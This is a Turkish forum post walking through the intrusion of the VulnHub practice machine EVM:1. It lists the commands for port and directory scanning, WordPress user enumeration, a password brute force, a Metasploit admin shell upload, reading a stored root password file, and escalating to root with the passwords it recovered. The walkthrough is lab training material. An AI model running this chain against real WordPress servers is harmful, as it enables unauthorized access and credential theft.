![logo.png](https://www.turkhackteam.org/styles/v1/tht/logo.png)
Selamlar Değerli TurkHackTeam Üyeleri ;
Bugün Sizlerle VulnHub da Bulunan EVM:1 Adlı Makineyi Çözeceğiz
Makine: LİNK
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
Önce nmap taraması yapalım,
nmap -A -p- -T4 ip
![Screenshot_2022-02-24_23_57_26.png](https://media.discordapp.net/attachments/947138711915741234/947139271708512266/Screenshot_2022-02-24_23_57_26.png?width=1241&height=630)
Ve nmap taramamız bitti,
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-24_23_59_09.png](https://media.discordapp.net/attachments/947138711915741234/947139271993737266/Screenshot_2022-02-24_23_59_09.png?width=1241&height=630)
![kbrn6ph.png](https://i.hizliresim.com/kbrn6ph.png)
80. portumuz açık sitemize gidelim.
![Screenshot_2022-02-24_23_59_32.png](https://media.discordapp.net/attachments/947138711915741234/947139272274767872/Screenshot_2022-02-24_23_59_32.png?width=1241&height=630)
Bizi defoult apache sayfası karşıladı, dirb aracı ile içindeki dizinleri bulalım
dirb http://ip/
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-24_23_59_53.png](https://media.discordapp.net/attachments/947138711915741234/947139350934736937/Screenshot_2022-02-24_23_59_53.png?width=1241&height=630)
![kbrn6ph.png](https://i.hizliresim.com/kbrn6ph.png)
Burada /wordpress adın da bir dizin var yani bir wp dizini hemen kullanıcısını bulalım.
wpscan --url http://ip/wordpress --enumerate u
![Screenshot_2022-02-25_00_06_20.png](https://media.discordapp.net/attachments/947138711915741234/947139351446429716/Screenshot_2022-02-25_00_06_20.png?width=1241&height=630)
Evet kullanıcı adımızı bulduk
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-25_00_06_14.png](https://media.discordapp.net/attachments/947138711915741234/947139351157047317/Screenshot_2022-02-25_00_06_14.png?width=1241&height=630)
Şimdi ise elimizde kullanıcı adı var şifre yok brute-force saldırısı ile şifreyi elde etmeye çalışalım.
wpscan --url http://ip/wordpress -U username -P wordlistiniz
![Screenshot_2022-02-25_00_09_10.png](https://media.discordapp.net/attachments/947138711915741234/947139351681306644/Screenshot_2022-02-25_00_09_10.png?width=1241&height=630)
Şifremizi buldu şifremiz 24992499 muş
![Screenshot_2022-02-25_00_19_52.png](https://media.discordapp.net/attachments/947138711915741234/947139272861945938/Screenshot_2022-02-25_00_19_52.png?width=1241&height=630)
![kbrn6ph.png](https://i.hizliresim.com/kbrn6ph.png)
Şimdi metasploit üzerinden shell sokmayı denicem
msfconsole -q
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-25_01_08_07.png](https://media.discordapp.net/attachments/947138711915741234/947139273235263538/Screenshot_2022-02-25_01_08_07.png?width=1241&height=630)
use exploit/unix/webapp/wp_admin_shell_upload
diyerek exploitimizi seçelim
![Screenshot_2022-02-25_01_09_41.png](https://media.discordapp.net/attachments/947138711915741234/947139351916204122/Screenshot_2022-02-25_01_09_41.png?width=1241&height=630)
Daha sonra exploitimizin ayarlarını yaptıktan sonra exploit diyerek bağlantı alalım,
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-25_01_11_08.png](https://media.discordapp.net/attachments/947138711915741234/947139352172064789/Screenshot_2022-02-25_01_11_08.png?width=1241&height=630)
ls dedikten sonra root3r adında dizin var oraya giriyorum
![Screenshot_2022-02-25_01_12_59.png](https://media.discordapp.net/attachments/947138711915741234/947139352457281577/Screenshot_2022-02-25_01_12_59.png?width=1241&height=630)
burada root için gerekli password txt dosyası var cat komutu ile okuyorum
cat .root_password_ssh.txt
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-25_01_15_39.png](https://media.discordapp.net/attachments/947138711915741234/947139352767643679/Screenshot_2022-02-25_01_15_39.png?width=1241&height=630)
![kbrn6ph.png](https://i.hizliresim.com/kbrn6ph.png)
shell diyerek shell oluşturuyorum ve
python -c 'import pty;pty.spawn("/bin/bash")'
komuyla www-data kullanıcısına ulaşıyorum
![Screenshot_2022-02-25_01_17_07.png](https://media.discordapp.net/attachments/947138711915741234/947139273507864637/Screenshot_2022-02-25_01_17_07.png?width=1241&height=630)
su root diyerek şifremi veriyorum willy26
daha sonra whoami dediğimde root kullanıcısı olduğumu görüyorum,
son olarak root dizininde dosyayı okuyorum.
![2tvb2gm.gif](https://i.hizliresim.com/2tvb2gm.gif)
![Screenshot_2022-02-25_01_18_12.png](https://media.discordapp.net/attachments/947138711915741234/947139273906327562/Screenshot_2022-02-25_01_18_12.png?width=1241&height=630)
![iUBacd.gif](https://i.hizliresim.com/iUBacd.gif)